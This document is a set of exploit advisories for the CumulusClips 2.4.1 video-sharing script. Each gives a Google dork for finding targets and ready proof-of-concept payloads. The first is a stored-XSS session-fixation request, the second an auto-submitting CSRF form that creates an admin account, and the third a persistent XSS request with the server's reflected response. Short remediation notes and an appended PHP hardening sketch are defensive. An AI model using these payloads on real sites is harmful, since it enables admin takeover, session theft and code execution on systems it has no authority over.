# Exploit Title: CumulusClips Session fixation
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie

Description:
CumulusClips is a video sharing script that allows you to start your own video website. CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers.

PoC:

POST /cumulusclips/account/videos/edit/1362/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1362/
Cookie: PHPSESSID=bqaok1gfcs0s7hqfc40g2bsbr1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 211

title=evilcartoon%3Cscript%3Edocument.cookie%3D%27PHPSESSID%3Dxxxxxxxxxxxxxxxxxxxxxxxxxx%3Bpath%3D%2F%3B%27%3C%2Fscript%3E&tags=aaa&cat_id=1&description=aaa&private_url=BOZtzZX&submitted=TRUE&button=Update+Video

Remediation:
Change the session id after successful login.

Post exploitation:
Since it is possible to impersonate the admin, there is a possibility for code execution and unrestricted file upload in the admin panel.

#######################################################

# Exploit Title: CumulusClips XSRF and code execution
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie
# CVE : [if applicable]

Description:
CumulusClips is a video sharing script that allows you to start your own video website. CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers.

PoC:

<html>
  <body>
    <form action="http://192.168.122.203/cumulusclips/cc-admin/members_add.php" method="POST">
      <input type="hidden" name="role" value="admin" />
      <input type="hidden" name="email" value="admin@mailinator.com" />
      <input type="hidden" name="username" value="newadmin" />
      <input type="hidden" name="password" value="newadminpass" />
      <input type="hidden" name="password-show" value="" />
      <input type="hidden" name="first_name" value="" />
      <input type="hidden" name="last_name" value="" />
      <input type="hidden" name="website" value="" />
      <input type="hidden" name="about_me" value="" />
      <input type="hidden" name="submitted" value="TRUE" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Remediation:
Use anti-CSRF tokens, fix all XSSes.

#######################################################

# Exploit Title: CumulusClips Persistent XSS
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie
# CVE : [if applicable]

Description:
CumulusClips is a video sharing script that allows you to start your own video website. CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers.

Any registered user may inject code into the main site. There is no HttpOnly flag on cookies, so it is possible to steal session information.

PoC:

Locations:
/cumulusclips/account/videos/edit/
/cumulusclips/account/upload/video/

POST /cumulusclips/account/videos/edit/1358/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1358/
Cookie: PHPSESSID=etia0ncfb00m0ma1834cf1dds5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 215

title=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&tags=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cat_id=1&description=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&private_url=DyZbn8m&submitted=TRUE&button=Update+Video

Reflected on the main site:

GET /cumulusclips/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/
Connection: close

RESPONSE:
...
<div class="video">
  <div class="thumbnail">
    <a href="http://192.168.122.203/cumulusclips/videos/1358/www-script-alert-1-script/" title="www<script>alert(1)</script>">
      <img width="165" height="92" src="http://192.168.122.203/cumulusclips/cc-content/uploads/thumbs/Ufi5q2RKsQtXwludfZnR.jpg" />
...

Post exploitation:
Since it is possible to steal the cookie and impersonate the admin, there is a possibility for code execution and unrestricted file upload in the admin panel.

Remediation:
Validate user input for special characters (preferably a white list), use the HttpOnly cookie flag.
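The three remediations above (regenerate the session id at login, anti-CSRF tokens, output escaping plus HttpOnly cookies) as one PHP sketch. This is an added example, not CumulusClips code; the helper names and the form handling are assumed for illustration.

```php
<?php
// Added example, not CumulusClips code: the three fixes the advisories ask
// for, as small helpers. Names and the form handling are assumed.
// 1. Session fixation: strict mode rejects session ids the server never
//    issued (a fixated PHPSESSID), and login always gets a fresh id.
function start_session(): void {
    ini_set('session.use_strict_mode', '1');
    session_set_cookie_params([
        'httponly' => true,   // 3. document.cookie cannot read it
        'samesite' => 'Lax',  // 2. cross-site POSTs do not carry it
        'secure'   => true,   // assumes the site is served over HTTPS
    ]);
    session_start();
}
function login_success(int $userId): void {
    session_regenerate_id(true);  // new id, old one deleted server-side
    $_SESSION['user_id'] = $userId;
}

// 2. CSRF: a per-session random token every state-changing form must echo.
function csrf_token(): string {
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}
function csrf_valid(array $post): bool {
    return isset($post['csrf'], $_SESSION['csrf'])
        && hash_equals($_SESSION['csrf'], (string) $post['csrf']);
}

// 3. Stored XSS: escape at output, so "www<script>alert(1)</script>" from
//    the PoC is rendered as text in both attribute and element context.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Sketch of a handler for a form like cc-admin/members_add.php (assumed).
start_session();
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_valid($_POST)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // ... create the member using validated $_POST fields ...
}
echo '<form method="POST"><input type="hidden" name="csrf" value="'
   . h(csrf_token()) . '"><input name="username"><button>Add</button></form>';
$title = 'www<script>alert(1)</script>';  // stored value from the XSS PoC
echo '<a href="/videos/1358/" title="' . h($title) . '">' . h($title) . '</a>';
```

With these in place the fixation PoC's attacker-chosen PHPSESSID is rejected before login and replaced after it, the cross-site members_add.php form fails the token check, and the stored title is rendered as literal text.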